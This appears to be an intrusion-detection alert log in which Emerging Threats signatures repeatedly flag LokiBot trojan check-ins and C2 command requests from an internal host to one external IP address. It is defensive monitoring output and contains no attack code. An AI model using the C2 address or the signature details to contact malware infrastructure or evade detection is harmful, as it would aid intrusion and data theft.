11/25/21-10:51:33.603281	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50243	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.090457	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50244	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.090457	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50244	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.090457	TCP	2025381	ET TROJAN LokiBot Checkin	50244	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.090457	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50244	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.587918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50245	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.587918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50245	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.587918	TCP	2025381	ET TROJAN LokiBot Checkin	50245	80	192.168.11.20	176.223.209.128
11/25/21-10:51:34.587918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50245	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.114157	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50246	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.114157	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50246	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.114157	TCP	2025381	ET TROJAN LokiBot Checkin	50246	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.114157	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50246	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.578964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50247	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.578964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50247	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.578964	TCP	2025381	ET TROJAN LokiBot Checkin	50247	80	192.168.11.20	176.223.209.128
11/25/21-10:51:35.578964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50247	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.082511	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50248	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.082511	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50248	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.082511	TCP	2025381	ET TROJAN LokiBot Checkin	50248	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.082511	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50248	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.600596	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50249	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.600596	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50249	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.600596	TCP	2025381	ET TROJAN LokiBot Checkin	50249	80	192.168.11.20	176.223.209.128
11/25/21-10:51:36.600596	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50249	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.097490	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50250	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.097490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50250	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.097490	TCP	2025381	ET TROJAN LokiBot Checkin	50250	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.097490	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50250	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.589318	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50251	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.589318	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50251	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.589318	TCP	2025381	ET TROJAN LokiBot Checkin	50251	80	192.168.11.20	176.223.209.128
11/25/21-10:51:37.589318	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50251	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.094882	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50252	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.094882	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50252	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.094882	TCP	2025381	ET TROJAN LokiBot Checkin	50252	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.094882	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50252	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.599425	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50253	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.599425	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50253	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.599425	TCP	2025381	ET TROJAN LokiBot Checkin	50253	80	192.168.11.20	176.223.209.128
11/25/21-10:51:38.599425	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50253	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.110252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50254	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.110252	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50254	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.110252	TCP	2025381	ET TROJAN LokiBot Checkin	50254	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.110252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50254	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.626539	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50255	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.626539	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50255	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.626539	TCP	2025381	ET TROJAN LokiBot Checkin	50255	80	192.168.11.20	176.223.209.128
11/25/21-10:51:39.626539	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50255	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.142402	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50256	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.142402	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50256	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.142402	TCP	2025381	ET TROJAN LokiBot Checkin	50256	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.142402	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50256	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.656007	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50257	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.656007	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50257	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.656007	TCP	2025381	ET TROJAN LokiBot Checkin	50257	80	192.168.11.20	176.223.209.128
11/25/21-10:51:40.656007	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50257	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.141474	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50258	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.141474	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50258	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.141474	TCP	2025381	ET TROJAN LokiBot Checkin	50258	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.141474	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50258	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.613563	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50259	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.613563	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50259	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.613563	TCP	2025381	ET TROJAN LokiBot Checkin	50259	80	192.168.11.20	176.223.209.128
11/25/21-10:51:41.613563	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50259	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.168918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50260	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.168918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50260	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.168918	TCP	2025381	ET TROJAN LokiBot Checkin	50260	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.168918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50260	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.653882	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50261	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.653882	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50261	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.653882	TCP	2025381	ET TROJAN LokiBot Checkin	50261	80	192.168.11.20	176.223.209.128
11/25/21-10:51:42.653882	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50261	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.154212	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50262	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.154212	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50262	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.154212	TCP	2025381	ET TROJAN LokiBot Checkin	50262	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.154212	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50262	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.663133	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50263	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.663133	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50263	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.663133	TCP	2025381	ET TROJAN LokiBot Checkin	50263	80	192.168.11.20	176.223.209.128
11/25/21-10:51:43.663133	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50263	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.124896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50264	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.124896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50264	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.124896	TCP	2025381	ET TROJAN LokiBot Checkin	50264	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.124896	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50264	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.645263	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50265	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.645263	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50265	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.645263	TCP	2025381	ET TROJAN LokiBot Checkin	50265	80	192.168.11.20	176.223.209.128
11/25/21-10:51:44.645263	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50265	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.106868	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50266	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.106868	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50266	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.106868	TCP	2025381	ET TROJAN LokiBot Checkin	50266	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.106868	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50266	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.594589	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50267	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.594589	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50267	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.594589	TCP	2025381	ET TROJAN LokiBot Checkin	50267	80	192.168.11.20	176.223.209.128
11/25/21-10:51:45.594589	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50267	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.101808	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50268	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.101808	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50268	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.101808	TCP	2025381	ET TROJAN LokiBot Checkin	50268	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.101808	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50268	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.597646	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50269	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.597646	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50269	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.597646	TCP	2025381	ET TROJAN LokiBot Checkin	50269	80	192.168.11.20	176.223.209.128
11/25/21-10:51:46.597646	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50269	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.109619	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50270	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.109619	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50270	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.109619	TCP	2025381	ET TROJAN LokiBot Checkin	50270	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.109619	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50270	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.611890	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50271	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.611890	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50271	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.611890	TCP	2025381	ET TROJAN LokiBot Checkin	50271	80	192.168.11.20	176.223.209.128
11/25/21-10:51:47.611890	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50271	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.126751	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50272	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.126751	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50272	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.126751	TCP	2025381	ET TROJAN LokiBot Checkin	50272	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.126751	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50272	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.626427	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50273	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.626427	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50273	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.626427	TCP	2025381	ET TROJAN LokiBot Checkin	50273	80	192.168.11.20	176.223.209.128
11/25/21-10:51:48.626427	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50273	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.081962	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50274	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.081962	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50274	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.081962	TCP	2025381	ET TROJAN LokiBot Checkin	50274	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.081962	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50274	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.567233	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50275	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.567233	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50275	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.567233	TCP	2025381	ET TROJAN LokiBot Checkin	50275	80	192.168.11.20	176.223.209.128
11/25/21-10:51:49.567233	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50275	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.073434	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50276	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.073434	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50276	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.073434	TCP	2025381	ET TROJAN LokiBot Checkin	50276	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.073434	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50276	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.587694	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50277	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.587694	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50277	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.587694	TCP	2025381	ET TROJAN LokiBot Checkin	50277	80	192.168.11.20	176.223.209.128
11/25/21-10:51:50.587694	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50277	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.089071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50278	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.089071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50278	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.089071	TCP	2025381	ET TROJAN LokiBot Checkin	50278	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.089071	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50278	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.558423	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50279	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.558423	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50279	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.558423	TCP	2025381	ET TROJAN LokiBot Checkin	50279	80	192.168.11.20	176.223.209.128
11/25/21-10:51:51.558423	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50279	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.059238	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50280	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.059238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50280	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.059238	TCP	2025381	ET TROJAN LokiBot Checkin	50280	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.059238	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50280	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.528089	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50281	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.528089	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50281	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.528089	TCP	2025381	ET TROJAN LokiBot Checkin	50281	80	192.168.11.20	176.223.209.128
11/25/21-10:51:52.528089	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50281	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.007933	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50282	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.007933	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50282	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.007933	TCP	2025381	ET TROJAN LokiBot Checkin	50282	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.007933	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50282	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.539837	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50283	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.539837	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50283	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.539837	TCP	2025381	ET TROJAN LokiBot Checkin	50283	80	192.168.11.20	176.223.209.128
11/25/21-10:51:53.539837	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50283	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.048854	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50284	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.048854	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50284	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.048854	TCP	2025381	ET TROJAN LokiBot Checkin	50284	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.048854	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50284	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.571504	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50285	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.571504	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50285	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.571504	TCP	2025381	ET TROJAN LokiBot Checkin	50285	80	192.168.11.20	176.223.209.128
11/25/21-10:51:54.571504	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50285	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.074582	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50286	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.074582	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50286	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.074582	TCP	2025381	ET TROJAN LokiBot Checkin	50286	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.074582	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50286	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.507302	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50287	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.507302	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50287	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.507302	TCP	2025381	ET TROJAN LokiBot Checkin	50287	80	192.168.11.20	176.223.209.128
11/25/21-10:51:55.507302	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50287	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.038112	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50288	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.038112	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50288	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.038112	TCP	2025381	ET TROJAN LokiBot Checkin	50288	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.038112	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50288	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.542012	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50289	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.542012	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50289	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.542012	TCP	2025381	ET TROJAN LokiBot Checkin	50289	80	192.168.11.20	176.223.209.128
11/25/21-10:51:56.542012	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50289	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.052498	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50290	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.052498	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50290	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.052498	TCP	2025381	ET TROJAN LokiBot Checkin	50290	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.052498	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50290	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.572349	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50291	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.572349	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50291	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.572349	TCP	2025381	ET TROJAN LokiBot Checkin	50291	80	192.168.11.20	176.223.209.128
11/25/21-10:51:57.572349	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50291	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.081695	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50292	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.081695	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50292	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.081695	TCP	2025381	ET TROJAN LokiBot Checkin	50292	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.081695	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50292	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.603737	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50293	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.603737	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50293	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.603737	TCP	2025381	ET TROJAN LokiBot Checkin	50293	80	192.168.11.20	176.223.209.128
11/25/21-10:51:58.603737	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50293	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.123735	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50294	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.123735	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50294	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.123735	TCP	2025381	ET TROJAN LokiBot Checkin	50294	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.123735	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50294	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.583120	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50295	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.583120	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50295	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.583120	TCP	2025381	ET TROJAN LokiBot Checkin	50295	80	192.168.11.20	176.223.209.128
11/25/21-10:51:59.583120	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50295	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.084926	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50296	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.084926	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50296	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.084926	TCP	2025381	ET TROJAN LokiBot Checkin	50296	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.084926	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50296	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.618989	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50297	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.618989	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50297	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.618989	TCP	2025381	ET TROJAN LokiBot Checkin	50297	80	192.168.11.20	176.223.209.128
11/25/21-10:52:00.618989	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50297	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.143885	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50298	80	192.168.11.20	176.223.209.128
